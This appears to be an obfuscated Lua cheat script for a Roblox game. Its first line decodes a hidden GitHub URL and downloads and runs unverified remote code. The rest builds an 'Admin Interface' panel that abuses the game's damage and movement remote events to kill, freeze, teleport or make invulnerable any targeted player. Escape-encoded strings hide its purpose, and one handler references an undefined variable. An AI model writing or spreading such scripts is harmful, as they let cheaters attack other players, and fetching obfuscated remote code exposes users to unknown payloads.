loadstring(game:HttpGet("\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\84\114\111\108\108\45\72\117\98\47\76\111\110\101\108\121\83\67\47\114\101\102\115\47\104\101\97\100\115\47\109\97\105\110\47\115\115\99"))()

local _0xPlayers=game:GetService("\80\108\97\121\101\114\115")local _0xRS=game:GetService("\82\101\112\108\105\99\97\116\101\100\83\116\111\114\97\103\101")local _0xLP=_0xPlayers.LocalPlayer local _0xCore=game:GetService("\67\111\114\101\71\117\105")local _0xTween=game:GetService("\84\119\101\101\110\83\101\114\118\105\99\101")local _0xUIS=game:GetService("\85\115\101\114\73\110\112\117\116\83\101\114\118\105\99\101")local _0xWS=game:GetService("\87\111\114\107\115\112\97\99\101")

local _0xBL={}local _0xSG=Instance.new("\83\99\114\101\101\110\71\117\105")_0xSG.Parent=_0xCore local _0xMF=Instance.new("\70\114\97\109\101")_0xMF.Size=UDim2.new(0,150,0,155)_0xMF.Position=UDim2.new(0.5,-75,0.3,0)_0xMF.BackgroundColor3=Color3.fromRGB(20,20,20)_0xMF.BackgroundTransparency=0.3_0xMF.BorderSizePixel=0_0xMF.Parent=_0xSG

local _0xGrad=Instance.new("\85\73\71\114\97\100\105\101\110\116")_0xGrad.Color=ColorSequence.new{ColorSequenceKeypoint.new(0,Color3.fromRGB(25,25,25)),ColorSequenceKeypoint.new(1,Color3.fromRGB(10,10,10))}_0xGrad.Rotation=45_0xGrad.Parent=_0xMF Instance.new("\85\73\67\111\114\110\101\114",_0xMF).CornerRadius=UDim.new(0,12)

local _0xMin=false local _0xHead=Instance.new("\70\114\97\109\101")_0xHead.Name="\72\101\97\100\101\114"_0xHead.Size=UDim2.new(1,0,0,20)_0xHead.BackgroundTransparency=1_0xHead.Parent=_0xMF

local _0xTL=Instance.new("\84\101\120\116\76\97\98\101\108")_0xTL.Size=UDim2.new(0.8,0,1,0)_0xTL.BackgroundTransparency=1_0xTL.Text="\65\100\109\105\110\32\73\110\116\101\114\102\97\99\101"_0xTL.TextColor3=Color3.fromRGB(255,255,255)_0xTL.TextScaled=true_0xTL.Font=Enum.Font.GothamSemibold_0xTL.Parent=_0xHead

local _0xMinBtn=Instance.new("\84\101\120\116\66\117\116\116\111\110")_0xMinBtn.Size=UDim2.new(0.2,0,1,0)_0xMinBtn.Position=UDim2.new(0.8,0,0,0)_0xMinBtn.BackgroundColor3=Color3.fromRGB(255,255,255)_0xMinBtn.Text="–"_0xMinBtn.TextColor3=Color3.fromRGB(0,0,0)_0xMinBtn.TextScaled=true_0xMinBtn.Font=Enum.Font.GothamSemibold_0xMinBtn.Parent=_0xHead

local _0xCF=Instance.new("\70\114\97\109\101")_0xCF.Name="\67\111\110\116\101\110\116\70\114\97\109\101"_0xCF.Size=UDim2.new(1,0,1,-20)_0xCF.Position=UDim2.new(0,0,0,20)_0xCF.BackgroundTransparency=1_0xCF.Parent=_0xMF

local _0xIF=Instance.new("\70\114\97\109\101")_0xIF.Name="\73\110\112\117\116\70\114\97\109\101"_0xIF.Size=UDim2.new(1,0,0,20)_0xIF.BackgroundTransparency=1_0xIF.Parent=_0xCF

local _0xIB=Instance.new("\84\101\120\116\66\111\120")_0xIB.Size=UDim2.new(0.9,0,0,16)_0xIB.Position=UDim2.new(0.05,0,0.1,0)_0xIB.BackgroundColor3=Color3.fromRGB(30,30,30)_0xIB.TextColor3=Color3.fromRGB(0,255,0)_0xIB.TextScaled=true_0xIB.PlaceholderText="???"_0xIB.Parent=_0xIF local _0xIG=Instance.new("\85\73\71\114\97\100\105\101\110\116")_0xIG.Color=ColorSequence.new{ColorSequenceKeypoint.new(0,Color3.fromRGB(35,35,35)),ColorSequenceKeypoint.new(1,Color3.fromRGB(25,25,25))}_0xIG.Rotation=45_0xIG.Parent=_0xIB Instance.new("\85\73\67\111\114\110\101\114",_0xIB).CornerRadius=UDim.new(0,8)

local _0xBF=Instance.new("\70\114\97\109\101")_0xBF.Name="\66\117\116\116\111\110\115\70\114\97\109\101"_0xBF.Size=UDim2.new(1,0,0,160)_0xBF.Position=UDim2.new(0,0,0,20)_0xBF.BackgroundTransparency=1_0xBF.Parent=_0xCF

local _0xGrid=Instance.new("\85\73\71\114\105\100\76\97\121\111\117\116")_0xGrid.CellSize=UDim2.new(0,65,0,24)_0xGrid.CellPadding=UDim2.new(0,4,0,4)_0xGrid.FillDirectionMaxCells=2_0xGrid.SortOrder=Enum.SortOrder.LayoutOrder_0xGrid.Parent=_0xBF

_0xMinBtn.MouseButton1Click:Connect(function()_0xMin=not _0xMin local sz=_0xMin and UDim2.new(0,150,0,20)or UDim2.new(0,150,0,155)_0xTween:Create(_0xMF,TweenInfo.new(0.3,Enum.EasingStyle.Quad),{Size=sz}):Play()_0xCF.Visible=not _0xMin local rot=_0xMin and 180 or 0 _0xTween:Create(_0xMinBtn,TweenInfo.new(0.3,Enum.EasingStyle.Quad),{Rotation=rot}):Play()_0xMinBtn.Text=_0xMin and"+"or"–"end)

local _dr,_di,_ds,_sp=nil,nil,nil,nil _0xHead.InputBegan:Connect(function(i)if i.UserInputType==Enum.UserInputType.MouseButton1 or i.UserInputType==Enum.UserInputType.Touch then _dr=true _ds=i.Position _sp=_0xMF.Position input.Changed:Connect(function()if input.UserInputState==Enum.UserInputState.End then _dr=false end end)end end)_0xHead.InputChanged:Connect(function(i)if i.UserInputType==Enum.UserInputType.MouseMovement or i.UserInputType==Enum.UserInputType.Touch then _di=i end end)_0xUIS.InputChanged:Connect(function(i)if i==_di and _dr then local del=i.Position-_ds _0xMF.Position=UDim2.new(_sp.X.Scale,_sp.X.Offset+del.X,_sp.Y.Scale,_sp.Y.Offset+del.Y)end end)

local function _0xGP(t)local lt=string.lower(t or"")local mp={}if lt=="all"then return _0xPlayers:GetPlayers()elseif lt=="others"then for _,p in _0xPlayers:GetPlayers()do if p~=_0xLP then table.insert(mp,p)end end elseif lt=="me"then return{_0xLP}else for _,p in _0xPlayers:GetPlayers()do local nl=string.lower(p.Name)local dl=string.lower(p.DisplayName or"")if nl:find(lt)or dl:find(lt)or nl==lt or dl==lt then table.insert(mp,p)end end end return mp end

local function _0xSPE(b)for i=1,5 do local par=Instance.new("\73\109\97\103\101\76\97\98\101\108")par.Size=UDim2.new(0,6,0,6)par.Position=UDim2.new(0.5,0,0.5,0)par.AnchorPoint=Vector2.new(0.5,0.5)par.BackgroundTransparency=1 par.Image="\114\98\120\97\115\115\101\116\105\100\58\47\47\50\55\57\53\55\57\48"par.ImageColor3=Color3.new(math.random(),math.random(),math.random())par.Parent=b local off=UDim2.new(0,math.random(-20,20),0,math.random(-20,20))local ti=TweenInfo.new(0.5,Enum.EasingStyle.Quad)_0xTween:Create(par,ti,{Position=off,ImageTransparency=0}):Play()task.delay(0.6,function()par:Destroy()end)end end

local function _0xEC(cmd)local tgt=_0xIB.Text local tps=_0xGP(tgt)for _,pl in tps do if not pl.Character then continue end local ch=pl.Character local hu=ch:FindFirstChildOfClass("\72\117\109\97\110\111\105\100")local pp=ch.PrimaryPart if not(hu and pp)then continue end local ev=_0xRS._BindableEvents.Moves if cmd=="bring"then ev.StopEnemy:FireServer(true,ch,pp.CFrame)task.wait(0.04)ev.StopEnemy:FireServer(false,ch)elseif cmd=="kill"then ev.TakeDamage:FireServer(hu,1e111,_0xLP)elseif cmd=="heal"then ev.TakeDamage:FireServer(hu,-1e9,_0xLP)elseif cmd=="freeze"then ev.StopEnemy:FireServer(true,ch,pp.CFrame)elseif cmd=="unfreeze"then ev.StopEnemy:FireServer(false,ch)elseif cmd=="to"then if _0xLP.Character and _0xLP.Character.PrimaryPart then _0xLP.Character:SetPrimaryPartCFrame(pp.CFrame)end elseif cmd=="b1"then local mp=_0xWS:FindFirstChild("\77\97\112")if mp then mp=mp.DBS.DB:FindFirstChild("\68\66\49")if mp then ev.StopEnemy:FireServer(true,ch,mp.CFrame)task.wait()ev.StopEnemy:FireServer(false,ch)end end elseif cmd=="permGod"then ev.TakeDamage:FireServer(hu,-1e111,_0xLP)task.wait(0.07)ev.TakeDamage:FireServer(hu,1e111,_0xLP)end end end

local _cmds={"bring","kill","heal","freeze","unfreeze","to","b1","permGod"}for i,c in ipairs(_cmds)do local btn=Instance.new("\84\101\120\116\66\117\116\116\111\110")btn.Parent=_0xBF btn.BackgroundColor3=Color3.fromRGB(40,20,50)btn.Text=string.upper(c)btn.TextColor3=Color3.new(0.9,0.9,1)btn.TextScaled=true btn.Font=Enum.Font.Gotham btn.Size=UDim2.new(0,65,0,24)Instance.new("\85\73\67\111\114\110\101\114",btn).CornerRadius=UDim.new(0,6)btn.MouseButton1Click:Connect(function()_0xEC(c)_0xSPE(btn)end)end
